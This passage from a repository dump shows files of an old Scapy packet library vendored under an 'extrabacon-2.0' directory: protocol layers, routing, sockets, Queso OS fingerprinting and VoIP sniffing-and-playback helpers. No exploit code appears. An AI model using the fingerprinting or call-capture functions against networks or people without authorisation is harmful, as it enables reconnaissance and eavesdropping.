7: 'LPC', 14 | 8: 'PCMA', 9: 'G722', 15 | 10: 'L16', 11: 'L16', 16 | 12: 'QCELP', 13: 'CN', 17 | 14: 'MPA', 15: 'G728', 18 | 16: 'DVI4', 17: 'DVI4', 19 | 18: 'G729', 25: 'CelB', 20 | 26: 'JPEG', 28: 'nv', 21 | 31: 'H261', 32: 'MPV', 22 | 33: 'MP2T', 34: 'H263' } 23 | 24 | class RTP(Packet): 25 | name="RTP" 26 | fields_desc = [ BitField('version', 2, 2), 27 | BitField('padding', 0, 1), 28 | BitField('extension', 0, 1), 29 | BitFieldLenField('numsync', None, 4, count_of='sync'), 30 | BitField('marker', 0, 1), 31 | BitEnumField('payload', 0, 7, _rtp_payload_types), 32 | ShortField('sequence', 0), 33 | IntField('timestamp', 0), 34 | IntField('sourcesync', 0), 35 | FieldListField('sync', [], IntField("id",0), count_from=lambda pkt:pkt.numsync) ] 36 | 37 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/layers/sebek.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | from scapy.fields import * 7 | from scapy.packet import * 8 | from scapy.layers.inet import UDP 9 | 10 | 11 | ### SEBEK 12 | 13 | 14 | class SebekHead(Packet): 15 | name = "Sebek header" 16 | fields_desc = [ XIntField("magic", 0xd0d0d0), 17 | ShortField("version", 1), 18 | ShortEnumField("type", 0, {"read":0, "write":1, 19 | "socket":2, "open":3}), 20 | IntField("counter", 0), 21 | IntField("time_sec", 0), 22 | IntField("time_usec", 0) ] 23 | def mysummary(self): 24 | return self.sprintf("Sebek Header v%SebekHead.version% %SebekHead.type%") 25 | 26 | # we need this because Sebek headers differ between v1 and v3, and 27 | # between v3 type socket and v3 others 28 | 29 | class SebekV1(Packet): 30 | name = "Sebek v1" 31 | fields_desc = [ IntField("pid", 0), 32 | IntField("uid", 0), 33 | IntField("fd", 0), 34 | StrFixedLenField("command", "", 12), 35 | FieldLenField("data_length", None, "data",fmt="I"), 36 | StrLenField("data", "", length_from=lambda x:x.data_length) ] 37 | def mysummary(self): 38 | if isinstance(self.underlayer, SebekHead): 39 | return self.underlayer.sprintf("Sebek v1 %SebekHead.type% (%SebekV1.command%)") 40 | else: 41 | return self.sprintf("Sebek v1 (%SebekV1.command%)") 42 | 43 | class SebekV3(Packet): 44 | name = "Sebek v3" 45 | fields_desc = [ IntField("parent_pid", 0), 46 | IntField("pid", 0), 47 | IntField("uid", 0), 48 | IntField("fd", 0), 49 | IntField("inode", 0), 50 | StrFixedLenField("command", "", 12), 51 | FieldLenField("data_length", None, "data",fmt="I"), 52 | StrLenField("data", "", length_from=lambda x:x.data_length) ] 53 | def mysummary(self): 54 | if isinstance(self.underlayer, SebekHead): 55 | return self.underlayer.sprintf("Sebek v%SebekHead.version% %SebekHead.type% (%SebekV3.command%)") 56 | else: 57 | return self.sprintf("Sebek v3 (%SebekV3.command%)") 58 | 59 | class SebekV2(SebekV3): 60 | def mysummary(self): 61 | if isinstance(self.underlayer, SebekHead): 62 | return self.underlayer.sprintf("Sebek v%SebekHead.version% %SebekHead.type% (%SebekV2.command%)") 63 | else: 64 | return self.sprintf("Sebek v2 (%SebekV2.command%)") 65 | 66 | class SebekV3Sock(Packet): 67 | name = "Sebek v2 socket" 68 | fields_desc = [ IntField("parent_pid", 0), 69 | IntField("pid", 0), 70 | IntField("uid", 0), 71 | IntField("fd", 0), 72 | IntField("inode", 0), 73 | StrFixedLenField("command", "", 12), 74 | IntField("data_length", 15), 75 | IPField("dip", "127.0.0.1"), 76 | ShortField("dport", 0), 77 | IPField("sip", "127.0.0.1"), 78 | ShortField("sport", 0), 79 | ShortEnumField("call", 0, { "bind":2, 80 | "connect":3, "listen":4, 81 | "accept":5, "sendmsg":16, 82 | "recvmsg":17, "sendto":11, 83 | "recvfrom":12}), 84 | ByteEnumField("proto", 0, IP_PROTOS) ] 85 | def mysummary(self): 86 | if isinstance(self.underlayer, SebekHead): 87 | return self.underlayer.sprintf("Sebek v%SebekHead.version% %SebekHead.type% (%SebekV3Sock.command%)") 88 | else: 89 | return self.sprintf("Sebek v3 socket (%SebekV3Sock.command%)") 90 | 91 | class SebekV2Sock(SebekV3Sock): 92 | def mysummary(self): 93 | if isinstance(self.underlayer, SebekHead): 94 | return self.underlayer.sprintf("Sebek v%SebekHead.version% %SebekHead.type% (%SebekV2Sock.command%)") 95 | else: 96 | return self.sprintf("Sebek v2 socket (%SebekV2Sock.command%)") 97 | 98 | bind_layers( UDP, SebekHead, sport=1101) 99 | bind_layers( UDP, SebekHead, dport=1101) 100 | bind_layers( UDP, SebekHead, dport=1101, sport=1101) 101 | bind_layers( SebekHead, SebekV1, version=1) 102 | bind_layers( SebekHead, SebekV2Sock, version=2, type=2) 103 | bind_layers( SebekHead, SebekV2, version=2) 104 | bind_layers( SebekHead, SebekV3Sock, version=3, type=2) 105 | bind_layers( SebekHead, SebekV3, version=3) 106 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/layers/x509.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | from scapy.asn1packet import * 7 | from scapy.asn1fields import * 8 | 9 | ########## 10 | ## X509 ## 11 | ########## 12 | 13 | ######[ ASN1 class ]###### 14 | 15 | class ASN1_Class_X509(ASN1_Class_UNIVERSAL): 16 | name="X509" 17 | CONT0 = 0xa0 18 | CONT1 = 0xa1 19 | CONT2 = 0xa2 20 | CONT3 = 0xa3 21 | 22 | class ASN1_X509_CONT0(ASN1_SEQUENCE): 23 | tag = ASN1_Class_X509.CONT0 24 | 25 | class ASN1_X509_CONT1(ASN1_SEQUENCE): 26 | tag = ASN1_Class_X509.CONT1 27 | 28 | class ASN1_X509_CONT2(ASN1_SEQUENCE): 29 | tag = ASN1_Class_X509.CONT2 30 | 31 | class ASN1_X509_CONT3(ASN1_SEQUENCE): 32 | tag = ASN1_Class_X509.CONT3 33 | 34 | ######[ BER codecs ]####### 35 | 36 | class BERcodec_X509_CONT0(BERcodec_SEQUENCE): 37 | tag = ASN1_Class_X509.CONT0 38 | 39 | class BERcodec_X509_CONT1(BERcodec_SEQUENCE): 40 | tag = ASN1_Class_X509.CONT1 41 | 42 | class BERcodec_X509_CONT2(BERcodec_SEQUENCE): 43 | tag = ASN1_Class_X509.CONT2 44 | 45 | class BERcodec_X509_CONT3(BERcodec_SEQUENCE): 46 | tag = ASN1_Class_X509.CONT3 47 | 48 | ######[ ASN1 fields ]###### 49 | 50 | class ASN1F_X509_CONT0(ASN1F_SEQUENCE): 51 | ASN1_tag = ASN1_Class_X509.CONT0 52 | 53 | class ASN1F_X509_CONT1(ASN1F_SEQUENCE): 54 | ASN1_tag = ASN1_Class_X509.CONT1 55 | 56 | class ASN1F_X509_CONT2(ASN1F_SEQUENCE): 57 | ASN1_tag = ASN1_Class_X509.CONT2 58 | 59 | class ASN1F_X509_CONT3(ASN1F_SEQUENCE): 60 | ASN1_tag = ASN1_Class_X509.CONT3 61 | 62 | ######[ X509 packets ]###### 63 | 64 | class X509RDN(ASN1_Packet): 65 | ASN1_codec = ASN1_Codecs.BER 66 | ASN1_root = ASN1F_SET( 67 | ASN1F_SEQUENCE( ASN1F_OID("oid","2.5.4.6"), 68 | ASN1F_PRINTABLE_STRING("value","") 69 | ) 70 | ) 71 | 72 | class X509v3Ext(ASN1_Packet): 73 | ASN1_codec = ASN1_Codecs.BER 74 | ASN1_root = ASN1F_field("val",ASN1_NULL(0)) 75 | 76 | 77 | class X509Cert(ASN1_Packet): 78 | ASN1_codec = ASN1_Codecs.BER 79 | ASN1_root = ASN1F_SEQUENCE( 80 | ASN1F_SEQUENCE( 81 | ASN1F_optionnal(ASN1F_X509_CONT0(ASN1F_INTEGER("version",3))), 82 | ASN1F_INTEGER("sn",1), 83 | ASN1F_SEQUENCE(ASN1F_OID("sign_algo","1.2.840.113549.1.1.5"), 84 | ASN1F_field("sa_value",ASN1_NULL(0))), 85 | ASN1F_SEQUENCE_OF("issuer",[],X509RDN), 86 | ASN1F_SEQUENCE(ASN1F_UTC_TIME("not_before",ZuluTime(-600)), # ten minutes ago 87 | ASN1F_UTC_TIME("not_after",ZuluTime(+86400))), # for 24h 88 | ASN1F_SEQUENCE_OF("subject",[],X509RDN), 89 | ASN1F_SEQUENCE( 90 | ASN1F_SEQUENCE(ASN1F_OID("pubkey_algo","1.2.840.113549.1.1.1"), 91 | ASN1F_field("pk_value",ASN1_NULL(0))), 92 | ASN1F_BIT_STRING("pubkey","") 93 | ), 94 | ASN1F_optionnal(ASN1F_X509_CONT3(ASN1F_SEQUENCE_OF("x509v3ext",[],X509v3Ext))), 95 | 96 | ), 97 | ASN1F_SEQUENCE(ASN1F_OID("sign_algo2","1.2.840.113549.1.1.5"), 98 | ASN1F_field("sa2_value",ASN1_NULL(0))), 99 | ASN1F_BIT_STRING("signature","") 100 | ) 101 | 102 | 103 | 104 | 105 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/modules/__init__.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/modules/geoip.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | from scapy.data import KnowledgeBase 7 | from scapy.config import conf 8 | 9 | conf.IPCountry_base = "GeoIPCountry4Scapy.gz" 10 | conf.countryLoc_base = "countryLoc.csv" 11 | conf.gnuplot_world = "world.dat" 12 | 13 | 14 | ########################## 15 | ## IP location database ## 16 | ########################## 17 | 18 | class IPCountryKnowledgeBase(KnowledgeBase): 19 | """ 20 | How to generate the base : 21 | db = [] 22 | for l in open("GeoIPCountryWhois.csv").readlines(): 23 | s,e,c = l.split(",")[2:5] 24 | db.append((int(s[1:-1]),int(e[1:-1]),c[1:-1])) 25 | cPickle.dump(gzip.open("xxx","w"),db) 26 | """ 27 | def lazy_init(self): 28 | self.base = load_object(self.filename) 29 | 30 | 31 | class CountryLocKnowledgeBase(KnowledgeBase): 32 | def lazy_init(self): 33 | f=open(self.filename) 34 | self.base = {} 35 | while 1: 36 | l = f.readline() 37 | if not l: 38 | break 39 | l = l.strip().split(",") 40 | if len(l) != 3: 41 | continue 42 | c,lat,long = l 43 | 44 | self.base[c] = (float(long),float(lat)) 45 | f.close() 46 | 47 | 48 | 49 | @conf.commands.register 50 | def locate_ip(ip): 51 | """Get geographic coordinates from IP using geoip database""" 52 | ip=map(int,ip.split(".")) 53 | ip = ip[3]+(ip[2]<<8L)+(ip[1]<<16L)+(ip[0]<<24L) 54 | 55 | cloc = country_loc_kdb.get_base() 56 | db = IP_country_kdb.get_base() 57 | 58 | d=0 59 | f=len(db)-1 60 | while (f-d) > 1: 61 | guess = (d+f)/2 62 | if ip > db[guess][0]: 63 | d = guess 64 | else: 65 | f = guess 66 | s,e,c = db[guess] 67 | if s <= ip and ip <= e: 68 | return cloc.get(c,None) 69 | 70 | 71 | 72 | 73 | 74 | conf.IP_country_kdb = IPCountryKnowledgeBase(conf.IPCountry_base) 75 | conf.country_loc_kdb = CountryLocKnowledgeBase(conf.countryLoc_base) 76 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/modules/queso.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | from scapy.data import KnowledgeBase 7 | from scapy.config import conf 8 | from scapy.layers.inet import IP,TCP 9 | #from 10 | 11 | conf.queso_base ="/etc/queso.conf" 12 | 13 | 14 | ################# 15 | ## Queso stuff ## 16 | ################# 17 | 18 | 19 | def quesoTCPflags(flags): 20 | if flags == "-": 21 | return "-" 22 | flv = "FSRPAUXY" 23 | v = 0 24 | for i in flags: 25 | v |= 2**flv.index(i) 26 | return "%x" % v 27 | 28 | class QuesoKnowledgeBase(KnowledgeBase): 29 | def lazy_init(self): 30 | try: 31 | f = open(self.filename) 32 | except IOError: 33 | return 34 | self.base = {} 35 | p = None 36 | try: 37 | for l in f: 38 | l = l.strip() 39 | if not l or l[0] == ';': 40 | continue 41 | if l[0] == '*': 42 | if p is not None: 43 | p[""] = name 44 | name = l[1:].strip() 45 | p = self.base 46 | continue 47 | if l[0] not in list("0123456"): 48 | continue 49 | res = l[2:].split() 50 | res[-1] = quesoTCPflags(res[-1]) 51 | res = " ".join(res) 52 | if not p.has_key(res): 53 | p[res] = {} 54 | p = p[res] 55 | if p is not None: 56 | p[""] = name 57 | except: 58 | self.base = None 59 | warning("Can't load queso base [%s]", self.filename) 60 | f.close() 61 | 62 | 63 | queso_kdb = QuesoKnowledgeBase(conf.queso_base) 64 | 65 | 66 | def queso_sig(target, dport=80, timeout=3): 67 | p = queso_kdb.get_base() 68 | ret = [] 69 | for flags in ["S", "SA", "F", "FA", "SF", "P", "SEC"]: 70 | ans, unans = sr(IP(dst=target)/TCP(dport=dport,flags=flags,seq=RandInt()), 71 | timeout=timeout, verbose=0) 72 | if len(ans) == 0: 73 | rs = "- - - -" 74 | else: 75 | s,r = ans[0] 76 | rs = "%i" % (r.seq != 0) 77 | if not r.ack: 78 | r += " 0" 79 | elif r.ack-s.seq > 666: 80 | rs += " R" % 0 81 | else: 82 | rs += " +%i" % (r.ack-s.seq) 83 | rs += " %X" % r.window 84 | rs += " %x" % r.payload.flags 85 | ret.append(rs) 86 | return ret 87 | 88 | def queso_search(sig): 89 | p = queso_kdb.get_base() 90 | sig.reverse() 91 | ret = [] 92 | try: 93 | while sig: 94 | s = sig.pop() 95 | p = p[s] 96 | if p.has_key(""): 97 | ret.append(p[""]) 98 | except KeyError: 99 | pass 100 | return ret 101 | 102 | 103 | @conf.commands.register 104 | def queso(*args,**kargs): 105 | """Queso OS fingerprinting 106 | queso(target, dport=80, timeout=3)""" 107 | return queso_search(queso_sig(*args, **kargs)) 108 | 109 | 110 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/modules/voip.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | import os 7 | ################### 8 | ## Testing stuff ## 9 | ################### 10 | 11 | from fcntl import fcntl 12 | from scapy.sendrecv import sniff 13 | from scapy.packet import Raw 14 | from scapy.layers.inet import IP,UDP 15 | from scapy.layers.rtp import RTP 16 | from scapy.utils import get_temp_file 17 | 18 | 19 | def merge(x,y,sample_size=2): 20 | if len(x) > len(y): 21 | y += "\x00"*(len(x)-len(y)) 22 | elif len(x) < len(y): 23 | x += "\x00"*(len(y)-len(x)) 24 | m = "" 25 | ss=sample_size 26 | for i in range(len(x)/ss): 27 | m += x[ss*i:ss*(i+1)]+y[ss*i:ss*(i+1)] 28 | return m 29 | # return "".join(map(str.__add__, x, y)) 30 | 31 | 32 | def voip_play(s1,list=None,**kargs): 33 | FIFO=get_temp_file() 34 | FIFO1=FIFO % 1 35 | FIFO2=FIFO % 2 36 | 37 | os.mkfifo(FIFO1) 38 | os.mkfifo(FIFO2) 39 | try: 40 | os.system("soxmix -t .ul %s -t .ul %s -t ossdsp /dev/dsp &" % (FIFO1,FIFO2)) 41 | 42 | c1=open(FIFO1,"w", 4096) 43 | c2=open(FIFO2,"w", 4096) 44 | fcntl.fcntl(c1.fileno(),fcntl.F_SETFL, os.O_NONBLOCK) 45 | fcntl.fcntl(c2.fileno(),fcntl.F_SETFL, os.O_NONBLOCK) 46 | 47 | # dsp,rd = os.popen2("sox -t .ul -c 2 - -t ossdsp /dev/dsp") 48 | def play(pkt,last=[]): 49 | if not pkt: 50 | return 51 | if not pkt.haslayer(UDP): 52 | return 53 | ip=pkt.getlayer(IP) 54 | if s1 in [ip.src, ip.dst]: 55 | if not last: 56 | last.append(pkt) 57 | return 58 | load=last.pop() 59 | # x1 = load.load[12:] 60 | c1.write(load.load[12:]) 61 | if load.getlayer(IP).src == ip.src: 62 | # x2 = "" 63 | c2.write("\x00"*len(load.load[12:])) 64 | last.append(pkt) 65 | else: 66 | # x2 = pkt.load[:12] 67 | c2.write(pkt.load[12:]) 68 | # dsp.write(merge(x1,x2)) 69 | 70 | if list is None: 71 | sniff(store=0, prn=play, **kargs) 72 | else: 73 | for p in list: 74 | play(p) 75 | finally: 76 | os.unlink(FIFO1) 77 | os.unlink(FIFO2) 78 | 79 | 80 | 81 | def voip_play1(s1,list=None,**kargs): 82 | 83 | 84 | dsp,rd = os.popen2("sox -t .ul - -t ossdsp /dev/dsp") 85 | def play(pkt): 86 | if not pkt: 87 | return 88 | if not pkt.haslayer(UDP): 89 | return 90 | ip=pkt.getlayer(IP) 91 | if s1 in [ip.src, ip.dst]: 92 | dsp.write(pkt.getlayer(Raw).load[12:]) 93 | try: 94 | if list is None: 95 | sniff(store=0, prn=play, **kargs) 96 | else: 97 | for p in list: 98 | play(p) 99 | finally: 100 | dsp.close() 101 | rd.close() 102 | 103 | def voip_play2(s1,**kargs): 104 | dsp,rd = os.popen2("sox -t .ul -c 2 - -t ossdsp /dev/dsp") 105 | def play(pkt,last=[]): 106 | if not pkt: 107 | return 108 | if not pkt.haslayer(UDP): 109 | return 110 | ip=pkt.getlayer(IP) 111 | if s1 in [ip.src, ip.dst]: 112 | if not last: 113 | last.append(pkt) 114 | return 115 | load=last.pop() 116 | x1 = load.load[12:] 117 | # c1.write(load.load[12:]) 118 | if load.getlayer(IP).src == ip.src: 119 | x2 = "" 120 | # c2.write("\x00"*len(load.load[12:])) 121 | last.append(pkt) 122 | else: 123 | x2 = pkt.load[:12] 124 | # c2.write(pkt.load[12:]) 125 | dsp.write(merge(x1,x2)) 126 | 127 | sniff(store=0, prn=play, **kargs) 128 | 129 | def voip_play3(lst=None,**kargs): 130 | dsp,rd = os.popen2("sox -t .ul - -t ossdsp /dev/dsp") 131 | try: 132 | def play(pkt, dsp=dsp): 133 | if pkt and pkt.haslayer(UDP) and pkt.haslayer(Raw): 134 | dsp.write(pkt.getlayer(RTP).load) 135 | if lst is None: 136 | sniff(store=0, prn=play, **kargs) 137 | else: 138 | for p in lst: 139 | play(p) 140 | finally: 141 | try: 142 | dsp.close() 143 | rd.close() 144 | except: 145 | pass 146 | 147 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/pton_ntop.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | 7 | import socket,struct 8 | 9 | # These functions are missing when python is compiled 10 | # without IPv6 support, on Windows for instance 11 | 12 | def inet_pton(af, addr): 13 | """Convert an IP address from text representation into binary form""" 14 | if af == socket.AF_INET: 15 | return inet_aton(addr) 16 | elif af == socket.AF_INET6: 17 | # IPv6: The use of "::" indicates one or more groups of 16 bits of zeros. 18 | # We deal with this form of wildcard using a special marker. 19 | JOKER = "*" 20 | while "::" in addr: 21 | addr = addr.replace("::", ":" + JOKER + ":") 22 | joker_pos = None 23 | 24 | # The last part of an IPv6 address can be an IPv4 address 25 | ipv4_addr = None 26 | if "." in addr: 27 | ipv4_addr = addr.split(":")[-1] 28 | 29 | result = "" 30 | parts = addr.split(":") 31 | for part in parts: 32 | if part == JOKER: 33 | # Wildcard is only allowed once 34 | if joker_pos is None: 35 | joker_pos = len(result) 36 | else: 37 | raise Exception("Illegal syntax for IP address") 38 | elif part == ipv4_addr: # FIXME: Make sure IPv4 can only be last part 39 | # FIXME: inet_aton allows IPv4 addresses with less than 4 octets 40 | result += socket.inet_aton(ipv4_addr) 41 | else: 42 | # Each part must be 16bit. Add missing zeroes before decoding. 43 | try: 44 | result += part.rjust(4, "0").decode("hex") 45 | except TypeError: 46 | raise Exception("Illegal syntax for IP address") 47 | 48 | # If there's a wildcard, fill up with zeros to reach 128bit (16 bytes) 49 | if JOKER in addr: 50 | result = (result[:joker_pos] + "\x00" * (16 - len(result)) 51 | + result[joker_pos:]) 52 | 53 | if len(result) != 16: 54 | raise Exception("Illegal syntax for IP address") 55 | return result 56 | else: 57 | raise Exception("Address family not supported") 58 | 59 | 60 | def inet_ntop(af, addr): 61 | """Convert an IP address from binary form into text represenation""" 62 | if af == socket.AF_INET: 63 | return inet_ntoa(addr) 64 | elif af == socket.AF_INET6: 65 | # IPv6 addresses have 128bits (16 bytes) 66 | if len(addr) != 16: 67 | raise Exception("Illegal syntax for IP address") 68 | parts = [] 69 | for left in [0, 2, 4, 6, 8, 10, 12, 14]: 70 | try: 71 | value = struct.unpack("!H", addr[left:left+2])[0] 72 | hexstr = hex(value)[2:] 73 | except TypeError: 74 | raise Exception("Illegal syntax for IP address") 75 | parts.append(hexstr.lstrip("0").lower()) 76 | result = ":".join(parts) 77 | while ":::" in result: 78 | result = result.replace(":::", "::") 79 | # Leaving out leading and trailing zeros is only allowed with :: 80 | if result.endswith(":") and not result.endswith("::"): 81 | result = result + "0" 82 | if result.startswith(":") and not result.startswith("::"): 83 | result = "0" + result 84 | return result 85 | else: 86 | raise Exception("Address family not supported yet") 87 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/route.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | import socket 7 | from arch import read_routes,get_if_addr,LOOPBACK_NAME 8 | from utils import atol,ltoa,itom 9 | from config import conf 10 | from error import Scapy_Exception,warning 11 | 12 | ############################## 13 | ## Routing/Interfaces stuff ## 14 | ############################## 15 | 16 | class Route: 17 | def __init__(self): 18 | self.resync() 19 | self.s=socket.socket(socket.AF_INET, socket.SOCK_DGRAM) 20 | self.cache = {} 21 | 22 | def invalidate_cache(self): 23 | self.cache = {} 24 | 25 | def resync(self): 26 | self.invalidate_cache() 27 | self.routes = read_routes() 28 | 29 | def __repr__(self): 30 | rt = "Network Netmask Gateway Iface Output IP\n" 31 | for net,msk,gw,iface,addr in self.routes: 32 | rt += "%-15s %-15s %-15s %-15s %-15s\n" % (ltoa(net), 33 | ltoa(msk), 34 | gw, 35 | iface, 36 | addr) 37 | return rt 38 | 39 | def make_route(self, host=None, net=None, gw=None, dev=None): 40 | if host is not None: 41 | thenet,msk = host,32 42 | elif net is not None: 43 | thenet,msk = net.split("/") 44 | msk = int(msk) 45 | else: 46 | raise Scapy_Exception("make_route: Incorrect parameters. You should specify a host or a net") 47 | if gw is None: 48 | gw="0.0.0.0" 49 | if dev is None: 50 | if gw: 51 | nhop = gw 52 | else: 53 | nhop = thenet 54 | dev,ifaddr,x = self.route(nhop) 55 | else: 56 | ifaddr = get_if_addr(dev) 57 | return (atol(thenet), itom(msk), gw, dev, ifaddr) 58 | 59 | def add(self, *args, **kargs): 60 | """Ex: 61 | add(net="192.168.1.0/24",gw="1.2.3.4") 62 | """ 63 | self.invalidate_cache() 64 | self.routes.append(self.make_route(*args,**kargs)) 65 | 66 | 67 | def delt(self, *args, **kargs): 68 | """delt(host|net, gw|dev)""" 69 | self.invalidate_cache() 70 | route = self.make_route(*args,**kargs) 71 | try: 72 | i=self.routes.index(route) 73 | del(self.routes[i]) 74 | except ValueError: 75 | warning("no matching route found") 76 | 77 | def ifchange(self, iff, addr): 78 | self.invalidate_cache() 79 | the_addr,the_msk = (addr.split("/")+["32"])[:2] 80 | the_msk = itom(int(the_msk)) 81 | the_rawaddr = atol(the_addr) 82 | the_net = the_rawaddr & the_msk 83 | 84 | 85 | for i in range(len(self.routes)): 86 | net,msk,gw,iface,addr = self.routes[i] 87 | if iface != iff: 88 | continue 89 | if gw == '0.0.0.0': 90 | self.routes[i] = (the_net,the_msk,gw,iface,the_addr) 91 | else: 92 | self.routes[i] = (net,msk,gw,iface,the_addr) 93 | conf.netcache.flush() 94 | 95 | 96 | 97 | def ifdel(self, iff): 98 | self.invalidate_cache() 99 | new_routes=[] 100 | for rt in self.routes: 101 | if rt[3] != iff: 102 | new_routes.append(rt) 103 | self.routes=new_routes 104 | 105 | def ifadd(self, iff, addr): 106 | self.invalidate_cache() 107 | the_addr,the_msk = (addr.split("/")+["32"])[:2] 108 | the_msk = itom(int(the_msk)) 109 | the_rawaddr = atol(the_addr) 110 | the_net = the_rawaddr & the_msk 111 | self.routes.append((the_net,the_msk,'0.0.0.0',iff,the_addr)) 112 | 113 | 114 | def route(self,dest,verbose=None): 115 | if type(dest) is list and dest: 116 | dest = dest[0] 117 | if dest in self.cache: 118 | return self.cache[dest] 119 | if verbose is None: 120 | verbose=conf.verb 121 | # Transform "192.168.*.1-5" to one IP of the set 122 | dst = dest.split("/")[0] 123 | dst = dst.replace("*","0") 124 | while 1: 125 | l = dst.find("-") 126 | if l < 0: 127 | break 128 | m = (dst[l:]+".").find(".") 129 | dst = dst[:l]+dst[l+m:] 130 | 131 | 132 | dst = atol(dst) 133 | pathes=[] 134 | for d,m,gw,i,a in self.routes: 135 | aa = atol(a) 136 | if aa == dst: 137 | pathes.append((0xffffffffL,(LOOPBACK_NAME,a,"0.0.0.0"))) 138 | if (dst & m) == (d & m): 139 | pathes.append((m,(i,a,gw))) 140 | if not pathes: 141 | if verbose: 142 | warning("No route found (no default route?)") 143 | return LOOPBACK_NAME,"0.0.0.0","0.0.0.0" #XXX linux specific! 144 | # Choose the more specific route (greatest netmask). 145 | # XXX: we don't care about metrics 146 | pathes.sort() 147 | ret = pathes[-1][1] 148 | self.cache[dest] = ret 149 | return ret 150 | 151 | def get_if_bcast(self, iff): 152 | for net, msk, gw, iface, addr in self.routes: 153 | if (iff == iface and net != 0L): 154 | bcast = atol(addr)|(~msk&0xffffffffL); # FIXME: check error in atol() 155 | return ltoa(bcast); 156 | warning("No broadcast address found for iface %s\n" % iff); 157 | 158 | conf.route=Route() 159 | 160 | #XXX use "with" 161 | _betteriface = conf.route.route("0.0.0.0", verbose=0)[0] 162 | if _betteriface != LOOPBACK_NAME: 163 | conf.iface = _betteriface 164 | del(_betteriface) 165 | -------------------------------------------------------------------------------- /extrabacon-2.0/scapy/supersocket.py: -------------------------------------------------------------------------------- 1 | ## This file is part of Scapy 2 | ## See http://www.secdev.org/projects/scapy for more informations 3 | ## Copyright (C) Philippe Biondi 4 | ## This program is published under a GPLv2 license 5 | 6 | import socket,time 7 | from config import conf 8 | from data import * 9 | 10 | class _SuperSocket_metaclass(type): 11 | def __repr__(self): 12 | if self.desc is not None: 13 | return "<%s: %s>" % (self.__name__,self.desc) 14 | else: 15 | return "<%s>" % self.__name__ 16 | 17 | 18 | class SuperSocket: 19 | __metaclass__ = _SuperSocket_metaclass 20 | desc = None 21 | closed=0 22 | def __init__(self, family=socket.AF_INET,type=socket.SOCK_STREAM, proto=0): 23 | self.ins = socket.socket(family, type, proto) 24 | self.outs = self.ins 25 | self.promisc=None 26 | def send(self, x): 27 | sx = str(x) 28 | x.sent_time = time.time() 29 | return self.outs.send(sx) 30 | def recv(self, x=MTU): 31 | return conf.raw_layer(self.ins.recv(x)) 32 | def fileno(self): 33 | return self.ins.fileno() 34 | def close(self): 35 | if self.closed: 36 | return 37 | self.closed=1 38 | if self.ins != self.outs: 39 | if self.outs and self.outs.fileno() != -1: 40 | self.outs.close() 41 | if self.ins and self.ins.fileno() != -1: 42 | self.ins.close() 43 | def sr(self, *args, **kargs): 44 | return sendrecv.sndrcv(self, *args, **kargs) 45 | def sr1(self, *args, **kargs): 46 | a,b = sendrecv.sndrcv(self, *args, **kargs) 47 | if len(a) > 0: 48 | return a[0][1] 49 | else: 50 | return None 51 | def sniff(self, *args, **kargs): 52 | return sendrecv.sniff(opened_socket=self, *args, **kargs) 53 | 54 | class L3RawSocket(SuperSocket): 55 | desc = "Layer 3 using Raw sockets (PF_INET/SOCK_RAW)" 56 | def __init__(self, type = ETH_P_IP, filter=None, iface=None, promisc=None, nofilter=0): 57 | self.outs = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW) 58 | self.outs.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1) 59 | self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) 60 | def recv(self, x=MTU): 61 | return Ether(self.ins.recv(x)).payload 62 | def send(self, x): 63 | try: 64 | sx = str(x) 65 | x.sent_time = time.time() 66 | self.outs.sendto(sx,(x.dst,0)) 67 | except socket.error,msg: 68 | log_runtime.error(msg) 69 | 70 | class SimpleSocket(SuperSocket): 71 | desc = "wrapper arround a classic socket" 72 | def __init__(self, sock): 73 | self.ins = sock 74 | self.outs = sock 75 | 76 | 77 | class StreamSocket(SimpleSocket): 78 | desc = "transforms a stream socket into a layer 2" 79 | def __init__(self, sock, basecls=None): 80 | if basecls is None: 81 | basecls = conf.raw_layer 82 | SimpleSocket.__init__(self, sock) 83 | self.basecls = basecls 84 | 85 | def recv(self, x=MTU): 86 | pkt = self.ins.recv(x, socket.MSG_PEEK) 87 | x = len(pkt) 88 | if x == 0: 89 | raise socket.error((100,"Underlying stream socket tore down")) 90 | pkt = self.basecls(pkt) 91 | pad = pkt[Padding] 92 | if pad is not None and pad.underlayer is not None: 93 | del(pad.underlayer.payload) 94 | while pad is not None and not isinstance(pad, NoPayload): 95 | x 